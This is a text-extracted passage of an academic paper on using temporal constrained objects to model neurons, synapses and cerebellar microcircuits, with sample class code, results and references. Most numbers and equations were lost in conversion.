t�t �rise � � ! ( a) fnorm ¼ e � tpeak�t �rise � � þ e� tpeak�t �decay � � ! : ( b) tpeak ¼ t þ �decay : �rise �decay � �rise : ln �decay �rise ( c) in temporal constrained object based implementation, synapses were also modelled using classes. continuous conductance changes of the synapses were represented as constraints in each constituent class. conditional constraints were used to represent the conductance changes before and after the stimulus onset. synaptic currents were calculated by automatically evaluating the constraints in each class. modelling neuronal interactions behaviour of sub-cellular or cellular components in biological neural circuits is not entirely sufficient to understand network function, since the dynamics and complexity of the neural systems are known to be nonlinear (koch & segev, ) (also see supplementary material, section ). in the bottom-up modelling of brain circuits, challenges remain in assessing how the properties of individual neurons combine together to produce the emergent behaviour at the circuit and translational levels. in designing large circuit models, new rules of interaction may emerge from underlying principles. here, tcob like frameworks offer a natural way to express the interactions by identifying and implementing the constraints. a network of neurons was modelled in tcob, where each neuron in the network was simulated with different number of excitatory and inhibitory synaptic inputs. excitatory synapses were modelled using ampa and nmda synaptic dynamics where inhibitory synapses were modelled using gaba synaptic dynamics (mccormick, wang & huguenard, ). all neurons were modelled as complex objects, i.e. consisting of other constrained objects with its own internal attributes and constraints (fig. ). nair et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the class neuron creates instances of the classes adex_neuron to include the neuron model and the classes ampa, gaba and nmda to model the synapses. fig. represents the tcob model for uml class diagram in fig. . the modelled neuron receives synaptic inputs through one ampa, one nmda and one gaba synapse. the total input current (iin) to a neuron was set as the sum of its synaptic currents using the constraint: n.iin =am.iampa+ga.igaba+nm.inmda; this constraint automatically enforces the relation between change in membrane voltage of the neuron and the synaptic inputs it receives. a cluster of such neurons were simulated by creating an array of tcob objects. constraint solving and evaluation of these objects utilized the implicit parallelization of constraints from the constraint store (hutchison & mitchell, ). modelling cerebellar microcircuits as a test of viability to use temporal constrained object based models for neural modelling, firing patterns of several types of known neurons of the cerebellum were reconstructed as in a previous study (nair et al., ). single neurons of wistar rat cerebellum were modelled and attempted mathematical reconstruction of small scale cerebellar microcircuits. associated with motor tasks and motor adaptation (kandel et al., ), cerebellum receives inputs from major motor regions of the brain and gives feedback to these sources. the significantly large number of granule cells in the input layer of the cerebellum distinguishes cerebellum from the rest of the nervous system. the computational significance of these neurons has been a topic of interest and granule cell has received recent attention in computational modelling studies attributed to the numerosity, its electronically compact structure, simpler dendritic arbor and the signal recoding computations that it performs on neuron <<attributes>> <<constraints>> <<constructor>> ..* ..* ..* ..* ..* ..* adex_neuron <<attributes>> <<constraints>> <<constructor>> nmda <<attributes>> <<constraints>> <<constructor>> gaba <<attributes>> <<constraints>> <<constructor>> ampa <<attributes>> <<constraints>> <<constructor>> figure uml representation of tcob implementation of a neuron with synapses. a single neuron is represented as an aggregate of a neuron model and model synapses. full-size doi: . /peerj-cs. /fig- nair et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the inputs that it receive from different brain regions (diwakar et al., ; solinas, nieus & d’angelo, ; d’angelo, ). to reconstruct all the computational elements of the cerebellar circuitry and their convergence-divergence ratios, computationally effective methods may be needed to model circuit functions (markram, ). the input to cerebellum is through mossy fibres innervating the granule and golgi neurons (fig. a). while golgi neurons inhibit granule neurons via a feed-forward inhibition, the axons of granule cells extend as parallel fibres and excite purkinje neurons. as in experiments (diwakar et al., ), modelled granule neuron receives on an average four excitatory and four inhibitory connections. in this paper, a small scale granular layer circuitry with purkinje neurons was modelled with temporal constrained objects (fig. b) using classes granule, golgi, purkinje, mossyfiber and parallelfiber respectively. a model neuron inherited from the neuron class and was represented using adex dynamics. excitatory synapses were modelled using ampa kinetics and inhibitory synapses were modelled using gaba kinetics. in the implementation, the microcircuit consisted of an aggregation of the neurons and synapses (fig. ). the temporal constrained object model of the microcircuit allowed computing the spike- train responses of constituent neurons. the class microcircuit (fig. ) modelled the rat granular layer neural circuit (also see uml flow diagram in fig. ). in the model, granule and golgi neurons received mossy fibre inputs and the change in membrane potential of golgi and purkinje neurons were automatically computed by satisfying internal and interface constraints. initial inputs to granule and golgi neurons were provided by mossy fibre. this was represented in the constraints: goc.mfinput = mf.input; grc.mfinput = mf.input; the variable spiketrain holds the response train of each neuron, generated as a result of model evaluation. class neuron { attributes adex_neuron n; ampa am; gaba ga;nmda nm; constraints am.vm = n.vm; ga.vm = n.vm; nm.vm = n.vm; n.iin =am.iampa+ga.igaba+nm.inmda; constructor neuron(){ n=new adex_neuron( . , . ,- . , . ,- . , . , . , . , . ,- . ); am = new ampa(); ga = new gaba(); nm = new nmda(); } } figure tcob representation of neuron with synapse. full-size doi: . /peerj-cs. /fig- nair et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the golgi neuron output is applied to granule neuron using the constraints goc.output = goc.spiketrain; grc.gocinput = goc.output such that the granule neuron receives both excitatory input through mossy fibres and inhibitory input through golgi neurons. mossy fiber inputs from various brain regions golgi cell granule cell purkinje cell basket cell stellate cell climbing fiber input from io parallel fiber output to dcn a mossy fiber + + - - + golgi cell granule cell purkinje cell parallel fiber input output b figure modelling sample cerebellar microcircuits. (a) circuits in the cerebellum: cartoon repre- sentation of interconnections in the input-output pathway of the cerebellum. (b) cellular components of the microcircuit reconstructed: granule neuron, golgi neuron and purkinje neuron, receiving inputs through excitatory (+) and inhibitory (-) synapses. full-size doi: . /peerj-cs. /fig- nair et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in the next level of processing, output from the granular layer is applied as the parallel fibre input into purkinje neurons using the constraints: grc.output = grc.spiketrain; pf.input = grc.output; pc.grcinput = pf.input; ..* ..* ..* ..* ..* ..* neuron <<attributes>> <<constraints>> <<constructor>> granule <<attributes>> <<constraints>> <<constructor>> golgi <<attributes>> <<constraints>> <<constructor>> purkinje <<attributes>> <<constraints>> <<constructor>> mossyfiber <<attributes>> <<constraints>> <<constructor>> parallelfiber <<attributes>> <<constraints>> <<constructor>> microcircuit <<attributes>> <<constraints>> <<constructor>> figure uml representation of temporal constrained object implementation of the microcircuit. granule, golgi and purkinje classes inherit from the class neuron. the classes mossy fiber and parallel fiber represented inputs to the neurons. in the implementation, the microcircuit consisted of an aggregation of the neurons and synapses. full-size doi: . /peerj-cs. /fig- class microcircuit { attributes mossyfiber mf; parallelfiber pf; granule grc; golgi goc; purkinje pc; constraints goc.mfinput = mf.input; grc.mfinput = mf.input; goc.output = goc.spiketrain; grc.gocinput = goc.output; grc.output = grc.spiketrain; pf.input = grc.output; pc.grcinput = pf.input; pc.output = pc.spiketrain; constructor microcircuit(){ ... } } figure representation of cerebellar microcircuit. full-size doi: . /peerj-cs. /fig- nair et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ after evaluating the constraints of purkinje neuron, the entire output from the microcircuit was made available as: pc.output = pc.spiketrain; the constraints highlighted above can be viewed as the interface constraints of the models while each object in the microcircuit class has its own internal constraint to be satisfied while object creation. the model evaluations were performed automatically while the constructor of the microcircuit class is called. the entire code with the programming environment is available freely at https://github. com/compneuro/tcob_neuron. results temporal spike train firing patterns in neurons to demonstrate the effectiveness of constraint evaluation results against state-of-the-art simulations, the output of tcob models were recorded using tcob predicates. using - v ol ta ge (m v ) i v a - - dc time(ms) time(ms) time(ms) v ol ta ge (m v ) - - v ol ta ge (m v ) - v o lt a g e (m v ) - v o lt a g e (m v ) fe time(ms) time(ms) . i = pa time(ms) m n h b figure modelling the spiking mechanisms of neurons. simulation times are in millisecond scale matching slice recordings (hodgkin & huxley, ). the initial resting membrane potential was kept at - mv. (a) firing of hh neuron for current stimuli of various amplitudes. the implementation showed repetitive firing behaviour for input current of six pa onwards. firing rate of the neuron depended on the intensity of the injected current. firing rate increased as the depolarizing current increases. (b) channel gating parameters m, n, h of the model for input current of three pa. m changed faster than h or n. during hyperpolarization m, h and n returned towards resting values. (c) regular spiking behaviour shown by most typical neurons in the cortex reproduced using izhikevich model. (d) chattering: stereotypical bursts of closely spaced spikes reproduced using izhikevich model. (e) tonic spiking with sharp reset showed the behaviour of certain constantly active neurons, modelled using adex equations. (f) adaptation behaviour of certain neurons showing the reduction in firing frequency, modelled using adex equations. full-size doi: . /peerj-cs. /fig- nair et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/compneuro/tcob_neuron https://github.com/compneuro/tcob_neuron http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ standard values for model parameters, voltage plots of continuous-time hh models and voltage-reset models, izhikevich and adex, were reproduced (naud et al., ). in hh models, computationally reconstructed action potential peaked at a voltage of + mv, followed by hyper-polarization following which the resting potential was re-established (hodgkin & huxley, ) (fig. a). as in experiments, when the injected current in the model was insufficient to depolarize the membrane, no action potential was generated. in our implementation, a minimum threshold non-zero current was observed for which the hh model demonstrated repeated firing, and the firing frequency increased with the increase in intensity of the input. the plot of hh gating variables depicted the behaviour of channel activation and inactivation (fig. b). izhikevich and adex models were also stimulated with input currents to reproduce various firing behaviour of different neuron types in the brain (figs. c– f). the neuron and synapse models implemented using temporal constrained objects were parameter optimized to reproduce the firing behaviour of different neuron types present in the cerebellum (medini et al., ; nair et al., ) under current clamp experiments (d’angelo et al., ; bezzi et al., ), during in vitro behaviour (as seen in brain slices) and during in vivo behaviour (as seen in anaesthetized rats) for inputs through mossy fibres (diwakar et al., ). single spike inputs were applied through the synapses to model in vitro inputs while small burst inputs (e.g., five spikes per burst) was used to model in vivo inputs (roggeri et al., ). the modelled responses of granule, golgi and purkinje neurons using adex neuron models for pa input current are shown in figs. a– c (medini et al., ). the modelled responses of granule neurons during in vitro inputs and in vivo inputs are shown in figs. d and e. cb - - - - - - - - granule vo lta ge (m v) - - - - - - - golgi vo lta ge (m v) - - - - - - - purkinje vo lta ge (m v) a - - membrane voltage v ol ta ge ( m v ) time (ms) d - - membrane voltage time (ms) v ol ta ge ( m v ) e figure modelling cerebellar neurons. (a–c) granule, golgi and purkinje neuron responses for current clamp protocol (i = pa), modelled using adex equations. (d and e) response of granule neurons for in vitro like (left) and in vivo like (right) spike inputs. full-size doi: . /peerj-cs. /fig- nair et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ synaptic dynamics resolved using tcob using a conductance-based synaptic mechanism, neurons were excited synaptically using pre-synaptic spike trains. alpha function reproduced the post-synaptic conductance of synapses with a finite rise time (fig. a). instantaneous rise and exponential decay of membrane potential were modelled using single exponential synapses (fig. b). a closer approximation of post-synaptic dynamics was obtained by employing double exponential models. fluctuations of synaptic conductance were approximated using rise time and decay time of conductance change independently (fig. c). the activation kinetics of excitatory and inhibitory synaptic receptors was modelled using ampa, nmda, gabaa and gabab receptor behaviour (fig. d). in the models, ampa channels mediated the fast-excitatory transmission and were characterized by fast rise time and decay time for the conductance values. significantly slower nmda channel modelled related to modifications of synaptic efficacy and temporal summation of currents. in the implementations, the two primary inhibitory receptor kinetics; gabaa and gabab modelled the fast and slow time course of inhibitory interactions. correctness of computations and performance improvements in tcob models to test numerical accuracy of tcob for floating point computations, the results of numerical integration of tcob were compared with imperative c++ implementation. fourth-order runge–kutta integration technique was employed for solving differential equations in the imperative implementation while numerical approximation using . . . . . . time (ms) c on du ct an ce ( g sy n) tau= ms tau= ms . . . time (ms) c on du ct an ce ( g sy n) tau= ms tau= ms - - - - - - time (ms) c on du ct an ce ( g sy n) taurise= ms ,taudecay= ms taurise= ms ,taudecay= ms - - - time (ms) c on du ct an ce ( g sy n) ampanmda gabaa gabab ba c d figure reconstructing synaptic dynamics using temporal constrained objects. (a) the conductance changes in alpha function for � = ms and � = ms. (b) synaptic conductance modelled using single exponential function for � = ms and � = ms. (c) synaptic conductance modelled using double exponential function. (d) modelled conductance changes for ampa, nmda, gabaa and gabab synapses for input spike at time t = ms. full-size doi: . /peerj-cs. /fig- nair et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ euler approach was used for the current tcob models. it has been observed that the membrane voltage traces produced by both approaches were approximately similar for the entire time evolution (figs. a– c). in this paper, we present the core concepts of tcob and we have not discussed library support for the language. it is straightforward to make standard solvers for differential equations, such as runge–kutta, as library functions so that the programmer does not have to define them. however, these solvers need to be ‘programmed’ by the end user, the specification occurs at a much higher level than would be the case in an imperative language such as c or c++. although loc are not always a definitive measure of software complexity, the declarative approach of a temporal constrained object model significantly reduced coding time, making the model more compact and closer to the problem specification, and hence also easier to understand, similar to scripting languages used in computational modelling. in comparison with the c++ version of the hh model, which required about loc, the temporal constrained object version was implemented in just loc. tcob compiler translates the temporal constrained objects program into prolog code which can be executed directly under swi-prolog with a clp(r) library. the potential sources of performance inefficiency of tcob are due to the layers of predicate calls arising from the systematic translation and also due to the repeated checking of consistency in the underlying constraint store. to alleviate these inefficiencies, we adapted - - voltage plots time (ms) v o lta g e (m v ) c++ tcob . . . . - - time (ms) v o lt a g e (m v ) c++ tcob a . . . . . . time step e xe cu tio n t im e ( s) translated code partially evaluated code b d partial evaluation - - tcob - - c++ v o lta g e (m v ) v o lta g e (m v ) time (ms) time (ms) c figure correctness of computations and performance improvement. (a) hh model voltage traces simulated using c++ and tcob for pa input current. inset shows the area of voltage plot in which absolute error was high. (b) firing patterns for spike train adaptation of neurons modelled with adex model and implemented in tcob. (c) firing patterns for spike train adaptation of neurons modelled with adex model and implemented in c++. (d) time step vs. execution time plot for hh model to show the improvement in performance time for partially evaluated code. full-size doi: . /peerj-cs. /fig- nair et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ and extended a partial evaluation technique (kannimoola, jayaraman & achuthan, ) for optimized code generation of constrained object programs that was first presented in tambay ( ). given the translated prolog program of tcob and a top-level goal, the partial evaluator outputs the list of constraints that need to be solved for the given goal. the partial evaluation process makes our implementation independent from constraint solver. on an intel i processor-based desktop computer with gb memory, the partially evaluated code for hh model executed approximately six times faster than the corresponding normal code (fig. d). discussion temporal constrained objects were able to successfully recreate substantive classes of neuroscience models related to time-varying behaviour using a declarative approach. with large-scale brain circuit models in mind, the compositional modelling requirement was tested by mathematically reconstructing the constituent components of neuronal network, i.e., neurons and synapses. models that followed continuous-time functions, such as the hh type neuron model, as well as different synaptic models were implemented in temporal constrained objects easily. special mention must be made of how temporal constrained objects were able to express voltage-reset models which exhibit piecewise continuous-time behaviour through a constant reset of the voltage. these models exhibit both discrete and continuous state changes, in contrast to the continuous-time behaviour of hh type neuron models. such systems that exhibited discontinuous behaviour or choice, such as the izhikevich- and adex-type neuron models, required injecting a discontinuous change during constraint-solving. temporal constrained objects were able to elegantly support this capability using series variables and conditional constraints, i.e., whenever the condition was met for resetting the voltage, the value of the series variable at the applicable point in time is set appropriately. it should be noted that this is not an imperative update of a state variable but rather the declarative specification of a value at a new point in time of the series variable. both continuous and voltage reset behaviour of the models implemented in temporal constrained objects, generated typical firing patterns of different neurons. even though we have used manually defined synaptic connections in the example scripts, conditional constraints and dynamic typing in tcob enables to use dynamic construction of objects based on the various conditions of the networks. since temporal constrained objects also supports unbounded arrays, neurons can be programmed to receive dynamic stimuli generated from constraints. since tcob programming environment use swi-prolog built-in predicates to create random numbers, synaptic jitter and other forms of randomness in the network can also be modelled easily. having been able to test that the tractability of employing temporal constrained objects as arbitrary neuron models, we perceive that temporal constrained object implementations allow continuous functions as in hh models or discrete state change of functions as in voltage reset models. constraint-based systems accumulate and aggregate the partial information from the set of constraints. moreover, the order of constraint specification does not depend on the final result, which permits the incremental addition of information to the constraint nair et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ store at any point of execution without worrying about the computation state. temporal constrained object-like frameworks are well-suited for modelling systems from which useful inferences are to be derived based on partial or incomplete information available at the current stage. in computational neuroscience of neurons and circuits, this feature enables the modeller to process information incrementally at each functional zone with in specialized brain circuits. conclusion in our temporal constrained object implementation, the modelled neural responses reproduced biologically validated and relevant outputs as observed in experiments. the identification of global constraints of the system are to be tested on a larger scale, i.e. at the population level. debugging network models in such frameworks has been changed to a constraint satisfaction problem where the constraint-solving algorithms operate on the constraint representation of the network variables, their domain and a set of relations between these variables. successively imposing constraints with the level of details expected makes the system automatically scalable in terms of its software representation. although the current implementation of temporal constrained objects is not most efficient to compare with specialised simulators available for computational neuroscience, it is hoped that with novel re-implementation of the temporal constrained objects programming platform, we would be able to express models for large-scale reconstructions in the future. with new computing architecture and multiple core gpus and cpus, it is crucial to consider declarative modelling strategies that allow implicit parallelization. this re-implementation, however, pilots a general-purpose constrained object-based programming paradigm to declaratively express both the concept space and computational space of neuron models where the model evaluations are automatically handled by the computational engine. while declarative languages provide a much higher level of abstraction and are more scalable, the execution of declarative programs under early implementations faced performance bottlenecks. since slight changes in the constraint formulation may lead to unpredictable changes in the performance of the system, stability of constraint formulation of a model has always been challenged. similar limitations exist while applying cost optimization techniques (barták, ). over the years, with advances in compiler and hardware technologies, the performance of declarative programs improved significantly, but is still not equal to that of imperative programs such as c or c++. detailed performance measures were introduced to reduce the execution time by using methodologies such as compile-time optimization and partial evaluation. with these improvements, we feel that our proposed paradigm of temporal constrained objects is a good candidate for modelling small- to medium-scale brain circuit structures. in order to build constrained-object-based simulators for large-scale networks, we propose studying the parallelization of temporal constrained objects. temporal constrained objects with parallelization are a promising approach for representing the emergent properties of systems that otherwise is too complex to model at multiple translational levels. nair et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ acknowledgements this work derives direction and ideas from the chancellor of amrita university, sri mata amritanandamayi devi. additional information and declarations funding this work was partially supported by grants sr/csri/ / from department of science and technology, young faculty research fellowship—sir visvesvaraya phd scheme, meity, government of india and by embracing the world. there was no additional external funding received for this study. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: department of science and technology: sr/csri/ / , young faculty research fellowship. competing interests the authors declare that they have no competing interests. author contributions � manjusha nair conceived and designed the experiments, performed the experiments, analysed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. � jinesh manchan kannimoola conceived and designed the experiments, performed the experiments, analysed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. � bharat jayaraman conceived and designed the experiments, performed the experiments, analysed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. � bipin nair analysed the data, authored or reviewed drafts of the paper, approved the final draft. � shyam diwakar conceived and designed the experiments, performed the experiments, analysed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, authored or reviewed drafts of the paper, approved the final draft. data availability the following information was supplied regarding data availability: github: https://github.com/compneuro/tcob_neuron. nair et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/compneuro/tcob_neuron http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . /peerj-cs. #supplemental-information. references barták r. . constraint programming: in pursuit of the holy grail. proceedings of the week of doctoral students. prague: univerzita karlova, – . benhamou f, jussien n, o’sullivan ba. . trends in constraint programming. london: wiley-iste. bezzi m, nieus t, coenen ojmd, d’angelo e. . an integrate-and-fire model of a cerebellar granule cell. neurocomputing – : – doi . /j.neucom. . . . borning a. . the programming language aspects of thinglab, a constraint-oriented simulation laboratory. acm transactions on programming languages and systems ( ): – doi . / . . brette r, gerstner w. . adaptive exponential integrate-and-fire model as an effective description of neuronal activity. journal of neurophysiology ( ): – doi . /jn. . . campeotto f, dal palù a, dovier a, fioretto f, pontelli e. . exploring the use of gpus in constraint solving. lecture notes in computer science : – doi . / - - - - _ . cannon rc, gleeson p, crook s, ganapathy g, marin b, piasini e, silver ra. . lems: a language for expressing complex biological models in concise and hierarchical form and its use in underpinning neuroml . frontiers in neuroinformatics : doi . /fninf. . . covert mw, famili i, palsson bo. . identifying constraints that govern cell behavior: a key to converting conceptual to computational models in biology? biotechnology and bioengineering ( ): – doi . /bit. . d’angelo e. . neural circuits of the cerebellum: hypothesis for function. journal of integrative neuroscience ( ): – doi . /s . d’angelo e, de filippi g, rossi p, taglietti v. . synaptic excitation of individual rat cerebellar granule cells in situ: evidence for the role of nmda receptors. journal of physiology ( ): – doi . /jphysiol. .sp . darlington j, reeve m, wright s. . declarative languages and program transformation for programming parallel systems: a case study. concurrency: computation practice and experience ( ): – doi . /cpe. . davison ap, brüderle d, eppler j, kremkow j, muller e, pecevski d, perrinet l, yger p. . pynn: a common interface for neuronal network simulators. frontiers in neuroinformatics : doi . /neuro. . . . destexhe a, mainen zf, sejnowski tj. . kinetic models of synaptic transmission. cambridge: mit press. diesmann m, gewaltig m-o. . nest: an environment for neural systems simulations. in: plesser t, macho v, eds. forschung und wisschenschaftliches rechnen. göttingen: beitrage zum heinz-billing-preis, – . diwakar s, magistretti j, goldfarb m, naldi g, d’angelo e. . axonal na + channels ensure fast spike activation and back-propagation in cerebellar granule cells. journal of neurophysiology ( ): – doi . /jn. . . nair et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /j.neucom. . . http://dx.doi.org/ . / . http://dx.doi.org/ . /jn. . http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /fninf. . http://dx.doi.org/ . /bit. http://dx.doi.org/ . /s http://dx.doi.org/ . /jphysiol. .sp http://dx.doi.org/ . /cpe. http://dx.doi.org/ . /neuro. . . http://dx.doi.org/ . /jn. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ felgentreff t, millstein t, borning a, hirschfeld r. . checks and balances: constraint solving without surprises in object-constraint programming languages. oopsla : proceedings of the acm sigplan international conference on object-oriented programming, systems, languages, and applications ( ): – doi . / . . freeman-benson bn, maloney j, borning a. . an incremental constraint solver. communications of the acm ( ): – doi . / . . fritzson p. . principles of object-oriented modeling and simulation with modelica . . hoboken: wiley-ieee press. gleeson p, crook s, cannon rc, hines ml, billings go, farinella m, morse tm, davison ap, ray s, bhalla us, barnes sr, dimitrova yd, silver ra. . neuroml: a language for describing data driven models of neurons and networks with a high degree of biological detail. plos computational biology ( ):e doi . /journal.pcbi. . goddard nh, hood g. . large scale simulation using parallel genesis. in: the book of genesis. new york: springer, – . goodman d, brette r. . brian: a simulator for spiking neural networks in python. frontiers in neuroinformatics : doi . /neuro. . . . govindarajan k, jayaraman b, mantha s. . optimization and relaxation in constraint logic languages. symposium on principles of programming languages. new york: acm, – . gupta v, jagadeesan r, saraswat v, bobrow dg. . programming in hybrid constraint languages. in: proceedings of the rd workshop on hybrid systems, october – . berlin: springer, . gutkin b, pinto d, ermentrout b. . mathematical neuroscience: from neurons to circuits to systems. journal of physiology ( – ): – doi . /j.jphysparis. . . . hines ml, carnevale nt. . the neuron simulation environment. neural computation ( ): – doi . /neco. . . . . hodgkin al, huxley af. . currents carried by sodium and potassium ions through the membrane of the giant axon of loligo. journal of physiology ( ): – doi . /jphysiol. .sp . hon a, chun w. . constraint programming in java with jsolver. in: proceedings of paclp , the practical application of constraint technologies and logic programming, london. horn b. . siri: a constrained-object language for reactive program implementation. pittsburgh, pa: school of computer science at research showcase at cmu. horn b. . constrained objects. phd thesis, carnegie mellon university. hucka m, finney a, sauro hm, bolouri h, doyle jc, kitano h, arkin ap, bornstein bj, bray d, cornish-bowden a, cuellar aa, dronov s, gilles ed, ginkel m, gor v, goryanin ii, hedley wj, hodgman tc, hofmeyr jh, hunter pj, juty ns, kasberger jl, kremling a, kummer u, le novère n, loew lm, lucio d, mendes p, minch e, mjolsness ed, nakayama y, nelson mr, nielsen pf, sakurada t, schaff jc, shapiro be, shimizu ts, spence hd, stelling j, takahashi k, tomita m, wagner j, wang j. . the systems biology markup language (sbml): a medium for representation and exchange of biochemical network models. bioinformatics ( ): – doi . /bioinformatics/btg . hutchison d, mitchell jc. . principles and practice of constraint programming—cp . berlin, heidelberg: springer. izhikevich em. . simple model of spiking neurons. ieee transactions on neural networks ( ): – doi . /tnn. . . nair et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . /journal.pcbi. http://dx.doi.org/ . /neuro. . . http://dx.doi.org/ . /j.jphysparis. . . http://dx.doi.org/ . /neco. . . . http://dx.doi.org/ . /jphysiol. .sp http://dx.doi.org/ . /bioinformatics/btg http://dx.doi.org/ . /tnn. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ jayaraman b, tambay p. . modeling engineering structures with constrained objects. lecture notes in computer science: practical aspects of declarative languages : – doi . / - - - _ . kandel er, schwartz jh, jessell tm, mack s, dodd j, butler j, lebowitz h, dahlgren s, supervisor p, siegel e, manager a, ackerman j, cuddihy j, graphics p, donnelley rr. . principles of neural science. mcgraw-hill: mcgraw-hill. kannimoola jm, jayaraman b, achuthan k. . dynamic constrained objects for vehicular system modeling. in: workshop on applied formal methods for safety-critical systems. singapore: springer. kannimoola jm, jayaraman b, achuthan k. . declarative modeling and verification of firewall rules with temporal constrained objects. in: nd symposium on application of formal methods for safety & security of critical systems. singapore: springer. kannimoola jm, jayaraman b, thampy p, achuthan k. . temporal constrained objects: application and implementation. computer languages, systems & structures : – doi . /j.cl. . . . koch c, segev i. . methods in neuronal modeling: from ions to networks. cambridge: mit press. lago jm, artalejo mr. . a declarative framework for object-oriented programming with genetic inheritance. theoretical computer science ( – ): – doi . /s - ( ) - . leler w. . specification and generation of constraint satisfaction systems. d. phil. thesis, university of north carolina. lloyd jw. . practical advantages of declarative programming. in: joint conference on declarative programming. pisa: italian association for logic programming, – . lopez g, freeman-benson b, borning a. . constraints and object identity. in: tokoro m, pareschi r, eds. object-oriented programming. ecoop . vol. . berlin, heidelberg: springer. markram h. . the blue brain project. nature reviews neuroscience ( ): – doi . /nrn . mccormick da, wang z, huguenard j. . neurotransmitter control of neocortical neuronal activity and excitability. cerebral cortex ( ): – doi . /cercor/ . . . medini c, vijayan a, angelo ed, nair b, diwakar s. . computationally efficient bio-realistic reconstructions of cerebellar neuron spiking patterns. in: proceedings of the international conference on interdisciplinary advances in applied computing—iconiaac’, new york. vol. , – . nair m, subramanyam k, nair b, diwakar s. . parameter optimization and nonlinear fitting for computational models in neuroscience on gpgpus. in: proceedings of ieee international conference on high performance computing and applications (ichpca- ). piscataway: ieee, – . naud r, marcille n, clopath c, gerstner w. . firing patterns in the adaptive exponential integrate-and-fire model. biological cybernetics ( – ): – doi . /s - - - . pushpendran m. . a constraint object approach to systems biology. m.sc. thesis, state university of new york. raikov i. . nineml—a description language for spiking neuron network modeling: the abstraction layer. bmc neuroscience (suppl ):p doi . / - - -s -p . nair et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . / - - - _ http://dx.doi.org/ . /j.cl. . . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /nrn http://dx.doi.org/ . /cercor/ . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . / - - -s -p http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ ray s, bhalla us. . pymoose: interoperable scripting in python for moose. frontiers in neuroinformatics : doi . /neuro. . . . reiner mj, zimmer d. . object-oriented modelling of wind turbines and its application for control design based on nonlinear dynamic inversion. mathematical and computer modelling of dynamical systems : – doi . / . . . richmond p, cope a, gurney k, allerton dj. . from model specification to simulation of biologically constrained networks of spiking neurons. neuroinformatics ( ): – doi . /s - - -z. roggeri l, rivieccio b, rossi p, d’angelo e. . tactile stimulation evokes long-term synaptic plasticity in the granular layer of cerebellum. journal of neuroscience: the official journal of the society for neuroscience ( ): – doi . /jneurosci. - . . rolf cc. . parallelism in constraint programming. d. phil. thesis, lund university. roth a, van rossum mcw. . modeling synapses. in: eric ds, ed. computational modeling methods for neuroscientists. cambridge: mit press, – . solinas s, nieus t, d’angelo e. . a realistic large-scale model of the cerebellum granular layer predicts circuit spatio-temporal filtering properties. frontiers in cellular neuroscience : doi . /fncel. . . tambay py. . constrained objects for modeling complex systems. d. phil. thesis, state university of new york. zaytsev yv, morrison a. . cynest: a maintainable cython-based interface for the nest simulator. frontiers in neuroinformatics : doi . /fninf. . . nair et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /neuro. . . http://dx.doi.org/ . / . . http://dx.doi.org/ . /s - - -z http://dx.doi.org/ . /jneurosci. - . http://dx.doi.org/ . /fncel. . http://dx.doi.org/ . /fninf. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ temporal constrained objects for modelling neuronal dynamics introduction background methods results discussion conclusion flink references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages 